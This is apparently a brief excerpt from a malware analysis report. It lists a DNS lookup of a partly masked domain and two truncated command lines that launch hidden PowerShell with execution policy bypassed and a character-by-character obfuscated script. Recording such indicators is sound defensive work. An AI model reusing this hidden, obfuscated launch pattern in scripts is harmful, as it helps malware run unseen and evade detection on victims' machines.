Technical Information
- DNS ASK po####utoon.info
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $ulmejqi='^$';$gycumy='^p';$eslyrj='^a';$axigzex='^t';$ukpymfa='^h';$ctidhen='^=';$jokpa='^(';$yxulxys='^$...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden $ulmejqi='^$';$gycumy='^p';$eslyrj='^a';$axigzex='^t';$ukpymfa='^h';$ctidhen='^=';$jokpa='^(';$yxulxys='^$...